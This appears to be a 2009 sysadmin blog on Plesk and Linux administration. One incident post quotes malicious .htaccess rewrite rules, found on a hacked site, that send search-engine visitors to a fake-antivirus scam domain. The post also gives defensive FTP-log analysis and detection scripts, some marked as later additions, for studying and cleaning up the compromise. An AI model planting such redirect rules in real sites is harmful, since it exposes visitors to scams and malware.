April 7th, 2009 — Linux, Plesk
We already know how to extract files from a Plesk backup with mpack, but if you receive a “File size limit exceeded” error, it can be for one of the following reasons:
- Your file system doesn’t have LFS (large file support)
- OS limits (limits on system resources imposed by your administrator)
- mpack is not compiled with LFS
Check that your filesystem supports files bigger than 2GB (create a test file with the “dd” command):
[vitalie@silver ~]$ dd if=/dev/zero of=test.bin bs=1G count=3 # create 3GB file
Then check your file size limits with the ulimit command:
[vitalie@silver ~]$ ulimit -a | grep '^file size'
file size (blocks, -f) unlimited
You can adjust limits in /etc/security/limits.conf; read the file’s comments on how to do it, or read this article:
http://www.cyberciti.biz/faq/file-size-limit-exceeded-error-under-linux-and-solution/
If none of the above limits you, then the problem comes from mpack: it doesn’t have support for large files (>2GB).
The people from Plesk recommend grepping the backup file to find the beginning and end of the file inside the archive:
http://kb.parallels.com/en/1757
This solution is not practical for large backup files, so we’ll just recompile mpack to support large files.
Grab mpack’s RPM source from Dag’s repository
http://dag.wieers.com/rpm/packages/mpack/mpack-1.6-2.rf.src.rpm
and install it:
[vitalie@silver ~]$ rpm -ivh mpack-1.6-2.rf.src.rpm
[...]
Then modify mpack.spec and add the following line after “%build” (it makes the build use 64-bit file offsets):
export CFLAGS="-D_FILE_OFFSET_BITS=64"
Then rebuild the package and install it:
[vitalie@silver ~] rpm -ba mpack.spec
[...]
[vitalie@silver ~] rpm -Uvh --force mpack-1.6-3.rf.i386.rpm
[...]
March 16th, 2009 — Plesk, Security
Today the website of one of our clients was blacklisted by Google for containing malicious software that downloads and installs without the user’s consent. Google displayed “This site may harm your computer” under the website in the results page.
Analyzing the site’s sources we found obfuscated JavaScript code inserted near the body and html tags in .html, .php and .tpl files, and a .htaccess file with the following content:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]
Hmm, visitors coming from search engines were redirected to real-antispyware.info. This website is a scam that shows a JavaScript animation fooling the user with a message that his computer is infected and prompting him to download and install a fake antivirus.
Analyzing the IP addresses in the ftp logs we found connections from Russia and China that altered the client’s website. Somehow they got the user’s ftp password (it can be done in many ways: weak password, traffic sniffing, virus, keylogger, trojan, …) and altered the website files.
You can use this simple Ruby script to analyze your ftp logs. By default it is configured for a Plesk server and it will show suspicious lines (change the IGNORE variables to fit your needs). You may need to install rubygems and the geoip gem.
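The referer-conditional redirect above is easy to spot mechanically. The following Ruby script is an added example, not code from the original post: it groups each RewriteRule with its preceding RewriteCond lines and reports the blocks that send search-engine referrals to a host other than your own. The own_host value and the vhosts path in the usage section are assumptions.

```ruby
#!/usr/bin/ruby
# Added example (not from the original post): find .htaccess rewrite
# blocks that send search-engine visitors to another host.

SEARCH_ENGINE_REFERERS = %w{google aol msn yahoo yandex rambler ya}

# Group each RewriteRule with the RewriteCond lines that precede it.
# Returns [{:conds => [{:var, :pattern}], :target => "...", :line => n}]
def rewrite_blocks(text)
  blocks = []
  conds = []
  text.each_line.with_index(1) do |raw, n|
    line = raw.strip                      # also drops CRLF endings (^M)
    case line
    when /\ARewriteCond\s+(\S+)\s+(\S+)/i
      conds << { :var => $1, :pattern => $2 }
    when /\ARewriteRule\s+(\S+)\s+(\S+)/i
      blocks << { :conds => conds, :target => $2, :line => n }
      conds = []
    end
  end
  blocks
end

# Blocks whose conditions test HTTP_REFERER against a search engine and
# whose target is an absolute URL on a host other than own_host: the
# fake-antivirus redirect pattern shown above.
def suspicious_redirects(text, own_host)
  rewrite_blocks(text).select do |b|
    engine_referer = b[:conds].any? do |c|
      c[:var] =~ /HTTP_REFERER/i &&
        SEARCH_ENGINE_REFERERS.any? { |e| c[:pattern].include?(e) }
    end
    target_host = b[:target][%r{\Ahttps?://([^/]+)}i, 1]
    engine_referer && target_host && target_host != own_host
  end
end

if __FILE__ == $0
  # scan every .htaccess under a Plesk vhosts tree (path is an assumption)
  Dir.glob("/var/www/vhosts/*/httpdocs/**/.htaccess").each do |path|
    suspicious_redirects(File.read(path), "www.example.com").each do |b|
      puts "#{path}:#{b[:line]} redirects search traffic to #{b[:target]}"
    end
  end
end
```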
#!/usr/bin/ruby
require 'rubygems'
require 'geoip'
require 'zlib'

# hide logs from these countries
# Example: RO US
IGNORE_COUNTRIES = %w{RO US}

# free geoip database is not 100% accurate
# we may need to ignore a few ip addresses
IGNORE_IP = %w{127.0.0.1 127.0.0.2}

# Plesk keeps the FTP transfer logs (plain and gzip-rotated) here
files = Dir.glob("/usr/local/psa/var/log/xferlog*")
geoip = GeoIP.new('/var/lib/GeoIP/GeoIP.dat')

# two-letter country code of an ip address
def ip2country(geoip, ip)
  geoip.country(ip)[3]
end

ip_list = []
files.each do |filename|
  puts ""
  puts "Processing #{filename} ..."
  File.open(filename) do |f|
    input = f
    # rotated logs are gzipped
    input = Zlib::GzipReader.new(f) if File.extname(filename) == ".gz"
    while line = input.gets do
      # the 7th field of an xferlog line is the remote host
      ip = line.split(/\s+/)[6]
      next unless ip
      # report only the first line seen from each new ip address
      unless ip_list.include? ip
        country = ip2country(geoip, ip)
        unless IGNORE_COUNTRIES.include? country.to_s.upcase or IGNORE_IP.include? ip
          puts " [#{country} : #{ip}] => #{line}"
        end
        ip_list << ip
      end
    end
  end
end
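The script above keys on the country of each address. A complementary view, shown in the following added example (not the original script), is which remote addresses uploaded web content at all: it parses the same Plesk xferlog format, keeps only inbound transfers of .php/.html/.tpl/.js files and .htaccess, and groups them by IP so an unknown address that rewrote those files stands out without any GeoIP database. The trusted IP list and the log lines in the test are constructed assumptions.

```ruby
#!/usr/bin/ruby
# Added example (not the original script): summarise FTP uploads of web
# content per remote IP from Plesk xferlog lines. No GeoIP needed.
require 'zlib'

# xferlog fields up to the user name; the 7th (index 6) is the remote host
XFERLOG_FIELDS = %w{wday mon day time year xfer_time host size path
                    type action direction mode user}

# files an intruder would touch to inject JavaScript or a redirect
WEB_FILE = %r{(\.(php|html?|tpl|js)|/\.htaccess)\z}i

# one xferlog line -> hash of named fields, or nil if the line is malformed
def parse_xferlog_line(line)
  fields = line.strip.split(/\s+/)
  return nil if fields.size < XFERLOG_FIELDS.size
  Hash[XFERLOG_FIELDS.zip(fields)]
end

# yields each line of a log file, transparently reading gzip-rotated ones
def read_xferlog(filename)
  File.open(filename) do |f|
    input = File.extname(filename) == ".gz" ? Zlib::GzipReader.new(f) : f
    input.each_line { |line| yield line }
  end
end

# { remote_ip => [uploaded web files] } for inbound transfers ('i') from
# addresses not in trusted_ips (your office, the server itself, ...)
def upload_summary(lines, trusted_ips = [])
  summary = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    rec = parse_xferlog_line(line) or next
    next unless rec["direction"] == "i"      # 'o' is a download
    next if trusted_ips.include?(rec["host"])
    next unless rec["path"] =~ WEB_FILE
    summary[rec["host"]] << rec["path"] unless summary[rec["host"]].include?(rec["path"])
  end
  summary
end

if __FILE__ == $0
  Dir.glob("/usr/local/psa/var/log/xferlog*").each do |filename|
    lines = []
    read_xferlog(filename) { |l| lines << l }
    upload_summary(lines, %w{127.0.0.1}).each { |ip, paths| puts "#{ip}: #{paths.join(' ')}" }
  end
end
```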
Steps that need to be followed:
- Change the FTP password
- Upload a clean copy of the website from your backups
- Submit the website in Webmaster Tools for reconsideration
- Audit your company’s security: computers, firewalls, antiviruses, software, …
You may also find Google’s diagnostic tool useful (replace example.com with your domain):
http://www.google.com/safebrowsing/diagnostic?site=http://example.com
February 8th, 2009 — Linux, Plesk
SMTP stands for Simple Mail Transfer Protocol; it was designed a long time ago when the Internet was a peaceful place. Today we are facing new challenges, so there should be new solutions.
One of the problems is SPAM: spammers keep bombarding us every day with junk mail. We invented black/white lists to protect ourselves from them.
If your clients connect from an IP address that is listed in RBLs (not uncommon for ISPs that use dynamic IP addresses), they can’t send messages through your server if you are using RBL checks.
Disabling RBL checks is not an option, so we’ll configure an alternative relaying port, 1025, for the clients listed in RBLs.
You can just copy your smtp_psa file and customize it:
cd /etc/xinetd.d/
cp smtp_psa smtp_alt_psa
vim smtp_alt_psa
You need to change the service name from smtp to smtp-alt and remove the rblsmtpd command and its -r parameters; in the end it should look something like this:
# /etc/xinetd.d/smtp_alt_psa
service smtp-alt
{
socket_type = stream
protocol = tcp
wait = no
disable = no
user = root
instances = UNLIMITED
server = /var/qmail/bin/tcp-env
server_args = -Rt0 /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}
Append the new service to /etc/services:
smtp-alt 1025/tcp
smtp-alt 1025/udp
And restart the xinetd service:
[root@sirius xinetd.d]# /etc/init.d/xinetd restart
Stopping xinetd: [ OK ]
Starting xinetd: [ OK ]
Verify your configuration with telnet command:
[root@sirius xinetd.d]# telnet localhost 1025
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 sirius.example.net ESMTP
# Ctrl+] and quit to exit telnet
Now instruct your clients to change the port in their SMTP settings from 25 to 1025; they will be able to send mail through your server even though you are using RBL lists. Note that relaylock and smtp_auth stay in server_args, so relaying on port 1025 is still restricted to authenticated clients.
January 16th, 2009 — Linux
FreeImage is not yet available as an RPM on CentOS/RHEL, so we’ll create one.
Before installing the libraries required by FreeImage, configure yum to use Dag’s repositories; see this post on how it can be done.
Learn how to set up your account to build RPMs as a non-privileged user:
http://www.cherpec.com/2009/01/build-rpms-as-simple-user/
[root@lynx ~] yum install libjpeg-devel libpng-devel libtiff-devel libmng-devel openexr-devel zlib-devel
[...]
Next, download the following files from FreeImage’s website and put them in your SOURCES directory:
Then download freeimage.spec and place it in the SPECS directory.
Now you are ready to build FreeImage: switch to the SPECS directory and build the package:
[joe@lynx SPECS]$ rpmbuild -ba freeimage.spec
[...]
+ umask 022
+ cd /home/joe/rpmbuild/BUILD
+ cd FreeImage
+ DOCDIR=/home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ export DOCDIR
+ rm -rf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ /bin/mkdir -p /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ cp -pr FreeImage3110.pdf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ exit 0
Provides: libfreeimage.so.3()(64bit)
Requires(rpmlib): rpmlib(CompressedFileNames) <= 3.0.4-1 rpmlib(PayloadFilesHavePrefix) <= 4.0-1
Requires: libc.so.6()(64bit) libc.so.6(GLIBC_2.2.5)(64bit) libc.so.6(GLIBC_2.3)(64bit) libgcc_s.so.1()(64bit) libgcc_s.so.1(GCC_3.0)(64bit) libstdc++.so.6()(64bit) libstdc++.so.
Processing files: freeimage-debuginfo-3.11.0-1
Checking for unpackaged file(s): /usr/lib/rpm/check-files /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot
Wrote: /home/joe/rpmbuild/SRPMS/freeimage-3.11.0-1.src.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-3.11.0-1.x86_64.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-debuginfo-3.11.0-1.x86_64.rpm
January 16th, 2009 — Linux
It’s not recommended to build your RPMs as root. You can build them as a simple user; to accomplish this, create a file called .rpmmacros in your home directory (we’ll assume that your user name is joe and your home directory is /home/joe):
# ~/.rpmmacros
%_topdir /home/joe/rpmbuild
%_tmppath %{_topdir}/tmp
Then create required directories:
[joe@lynx ~]$ mkdir -p ~/rpmbuild/{BUILD,RPMS/{noarch,i386,i586,i686,x86_64},SOURCES,SPECS,SRPMS,tmp}
You are ready to build your RPMs as a simple user.
January 4th, 2009 — Linux, Plesk
Sometimes you need to rebuild all your httpd.include files; it can be done with the websrvmng command:
/usr/local/psa/admin/bin/websrvmng -av
December 23rd, 2008 — Linux, Shell
rename is a handy command from the util-linux package when you need to rename multiple files. From the manual:
NAME
rename - Rename files
SYNOPSIS
rename from to file...
DESCRIPTION
rename will rename the specified files
by replacing the first occurrence of
from in their name by to.
...
Example usage:
[vitalie@silver london]$ ls -1
DSC00967.JPG
DSC00968.JPG
DSC00969.JPG
DSC00970.JPG
DSC00971.JPG
[vitalie@silver london]$ rename DSC00 london_ *.JPG
[vitalie@silver london]$ ls -1
london_967.JPG
london_968.JPG
london_969.JPG
london_970.JPG
london_971.JPG
December 23rd, 2008 — Linux, Plesk
If your server allows recursive queries from anyone, it can be abused by malicious users. Recursion should be restricted to IP addresses from your local networks.
To accomplish this, edit /etc/named.conf and specify in the “options” section which ACL is allowed to run recursive queries, using the allow-recursion option:
# /etc/named.conf
acl localnets { 127.0.0.1; 192.168.0.0/24; };
options {
...
allow-recursion { localnets; };
...
};
Then restart the bind server:
[root@red ~]# /etc/init.d/named restart
Stopping named: . [ OK ]
Starting named: [ OK ]
In Plesk it can be done from the Control Panel:
Server->DNS Settings->DNS Preferences->Allow recursion
and choose localhost or localnets.
November 21st, 2008 — Linux
Open your /etc/modprobe.conf file and append:
# Turn off IPv6
alias net-pf-10 off
alias ipv6 off
Then restart your server.
November 17th, 2008 — Linux
A lame server is when an NS record for a domain points to a server which is not authoritative for that domain.
To keep your logs (/var/log/messages) clean from lame server messages such as these:
[...]
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
[...]
Edit your /etc/named.conf and add:
logging {
category lame-servers { null; };
};
Then restart the bind daemon.